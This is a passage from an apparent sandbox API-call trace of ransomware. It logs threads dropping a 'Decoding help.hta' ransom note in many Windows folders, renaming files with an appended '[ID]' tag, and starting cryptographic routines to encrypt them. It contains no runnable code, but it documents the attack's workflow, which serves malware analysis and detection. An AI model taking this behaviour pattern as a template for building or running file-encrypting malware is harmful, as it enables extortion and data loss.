returned 1 [0061.461] CloseHandle (hObject=0x960) returned 1 [0062.528] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 966 os_tid = 0xc90 [0060.146] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*.*", lpFindFileData=0x1b8dfd30 | out: lpFindFileData=0x1b8dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x2cccb9b0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x2cccb9b0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbc658 [0061.617] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.617] FindNextFileW (in: hFindFile=0x10fbc658, lpFindFileData=0x1b8dfd30 | out: lpFindFileData=0x1b8dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x2cccb9b0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x2cccb9b0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.617] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0061.617] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.617] FindNextFileW (in: hFindFile=0x10fbc658, lpFindFileData=0x1b8dfd30 | out: lpFindFileData=0x1b8dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cccb9b0, ftCreationTime.dwHighDateTime=0x1d526b8, ftLastAccessTime.dwLowDateTime=0x2cccb9b0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x2cccb9b0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Decoding help.hta", cAlternateFileName="DECODI~1.HTA")) returned 1 Thread: id = 967 os_tid = 0xce4 [0060.146] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*.*", lpFindFileData=0x1b9dfd30 | out: lpFindFileData=0x1b9dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x2cccb9b0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x2cccb9b0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x24558b28 [0061.617] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.617] FindNextFileW (in: hFindFile=0x24558b28, lpFindFileData=0x1b9dfd30 | out: lpFindFileData=0x1b9dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x2cccb9b0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x2cccb9b0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.617] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0061.617] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.617] FindNextFileW (in: hFindFile=0x24558b28, lpFindFileData=0x1b9dfd30 | out: lpFindFileData=0x1b9dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cccb9b0, ftCreationTime.dwHighDateTime=0x1d526b8, ftLastAccessTime.dwLowDateTime=0x2cccb9b0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x2cccb9b0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Decoding help.hta", cAlternateFileName="DECODI~1.HTA")) returned 1 Thread: id = 968 os_tid = 0xc74 [0060.147] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\*.*", lpFindFileData=0x1badfd30 | out: lpFindFileData=0x1badfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x803feff7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x803feff7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fb9f18 [0060.147] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.147] FindNextFileW (in: hFindFile=0x10fb9f18, lpFindFileData=0x1badfd30 | out: lpFindFileData=0x1badfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x803feff7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x803feff7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.147] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.147] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.147] FindNextFileW (in: hFindFile=0x10fb9f18, lpFindFileData=0x1badfd30 | out: lpFindFileData=0x1badfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x803feff7, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bf1d2d9, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7bf1d2d9, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x1bd4, dwReserved0=0x0, dwReserved1=0x0, cFileName="FrameworkList.xml", cAlternateFileName="FRAMEW~1.XML")) returned 1 [0060.147] lstrcpyW (in: lpString1=0x24e4ed30, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\*.*" [0060.148] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\*.*") returned 81 [0060.148] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\Decoding help.hta" [0060.148] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\redistlist\\decoding help.hta")) returned 0xffffffff [0060.148] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\redistlist\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x960 [0061.462] WriteFile (in: hFile=0x960, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1badfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1badfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.462] CloseHandle (hObject=0x960) returned 1 [0061.463] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.463] lstrcmpiW (lpString1="Decoding help.hta", lpString2="FrameworkList.xml") returned -1 [0061.463] lstrlenW (lpString="FrameworkList.xml") returned 17 [0061.463] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\*.*" [0061.463] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\*.*") returned 81 [0061.463] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\", lpString2="FrameworkList.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml" [0061.463] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml" [0061.463] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0061.463] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\redistlist\\frameworklist.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\redistlist\\frameworklist.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.464] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\redistlist\\frameworklist.xml.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x960 [0061.464] CreateFileMappingA (hFile=0x960, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x348 [0061.464] CryptAcquireContextA (phProv=0x1badfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 969 os_tid = 0xc84 [0060.148] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\*.*", lpFindFileData=0x1bbdfd30 | out: lpFindFileData=0x1bbdfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x184eadb, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fb9f98 [0060.151] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.151] FindNextFileW (in: hFindFile=0x10fb9f98, lpFindFileData=0x1bbdfd30 | out: lpFindFileData=0x1bbdfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x184eadb, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.151] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.151] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.151] FindNextFileW (in: hFindFile=0x10fb9f98, lpFindFileData=0x1bbdfd30 | out: lpFindFileData=0x1bbdfd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0060.151] lstrcmpW (lpString1=".", lpString2="Credentials") returned -1 [0060.151] lstrcmpW (lpString1="..", lpString2="Credentials") returned -1 [0060.151] lstrcmpiW (lpString1="windows", lpString2="Credentials") returned 1 [0060.151] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\*.*" [0060.151] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\*.*") returned 48 [0060.151] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\", lpString2="Credentials" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials" [0060.152] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials\\*.*" [0060.152] GlobalMemoryStatus (in: lpBuffer=0x1bbdfd10 | out: lpBuffer=0x1bbdfd10) [0060.825] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5f30ee8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6c8 [0064.501] CloseHandle (hObject=0x6c8) returned 1 [0064.501] FindNextFileW (in: hFindFile=0x10fb9f98, lpFindFileData=0x1bbdfd30 | out: lpFindFileData=0x1bbdfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x66b2700, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xff0498b1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Feeds", cAlternateFileName="")) returned 1 [0064.501] lstrcmpW (lpString1=".", lpString2="Feeds") returned -1 [0064.501] lstrcmpW (lpString1="..", lpString2="Feeds") returned -1 [0064.501] lstrcmpiW (lpString1="windows", lpString2="Feeds") returned 1 Thread: id = 970 os_tid = 0x9b8 [0060.150] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\*.*", lpFindFileData=0x1bcdfd30 | out: lpFindFileData=0x1bcdfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3b34dcb8, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fb9f58 [0060.150] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.150] FindNextFileW (in: hFindFile=0x10fb9f58, lpFindFileData=0x1bcdfd30 | out: lpFindFileData=0x1bcdfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3b34dcb8, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.150] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.150] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.150] FindNextFileW (in: hFindFile=0x10fb9f58, lpFindFileData=0x1bcdfd30 | out: lpFindFileData=0x1bcdfd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6451100, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x77398c9, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FXSAPIDebugLogFile.txt", cAlternateFileName="FXSAPI~1.TXT")) returned 1 [0060.151] lstrcpyW (in: lpString1=0x5fb50f8, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\*.*" [0060.151] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\*.*") returned 43 [0060.151] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\Decoding help.hta") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\Decoding help.hta" [0060.151] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\Decoding help.hta" (normalized: "c:\\users\\default\\appdata\\local\\temp\\decoding help.hta")) returned 0xffffffff [0060.151] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\Decoding help.hta" (normalized: "c:\\users\\default\\appdata\\local\\temp\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa84 [0061.465] WriteFile (in: hFile=0xa84, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1bcdfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1bcdfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.465] CloseHandle (hObject=0xa84) returned 1 [0061.466] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.466] FindNextFileW (in: hFindFile=0x10fb9f58, lpFindFileData=0x1bcdfd30 | out: lpFindFileData=0x1bcdfd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6451100, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x77398c9, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FXSAPIDebugLogFile.txt", cAlternateFileName="FXSAPI~1.TXT")) returned 0 [0061.466] FindClose (in: hFindFile=0x10fb9f58 | out: hFindFile=0x10fb9f58) returned 1 Thread: id = 971 os_tid = 0x62c [0060.152] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\\*.*", lpFindFileData=0x1bddfd30 | out: lpFindFileData=0x1bddfd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 972 os_tid = 0xc94 [0060.152] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\*.*", lpFindFileData=0x1bedfd30 | out: lpFindFileData=0x1bedfd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfeffd5f0, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fb9fd8 [0060.153] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.153] FindNextFileW (in: hFindFile=0x10fb9fd8, lpFindFileData=0x1bedfd30 | out: lpFindFileData=0x1bedfd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfeffd5f0, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.153] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.153] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.153] FindNextFileW (in: hFindFile=0x10fb9fd8, lpFindFileData=0x1bedfd30 | out: lpFindFileData=0x1bedfd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfefb1330, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0060.153] lstrcpyW (in: lpString1=0x5fbd100, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\*.*") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\*.*" [0060.153] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\*.*") returned 40 [0060.153] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Decoding help.hta") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Decoding help.hta" [0060.153] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Decoding help.hta" (normalized: "c:\\users\\default\\favorites\\links\\decoding help.hta")) returned 0xffffffff [0060.153] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Decoding help.hta" (normalized: "c:\\users\\default\\favorites\\links\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x96c [0061.466] WriteFile (in: hFile=0x96c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1bedfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1bedfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.467] CloseHandle (hObject=0x96c) returned 1 [0061.467] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.467] lstrcmpiW (lpString1="Decoding help.hta", lpString2="desktop.ini") returned -1 [0061.467] lstrlenW (lpString="desktop.ini") returned 11 [0061.467] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\*.*") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\*.*" [0061.467] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\*.*") returned 40 [0061.468] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\", lpString2="desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini" [0061.468] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini" [0061.468] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0061.468] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\default\\favorites\\links\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\default\\favorites\\links\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0062.517] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\default\\favorites\\links\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 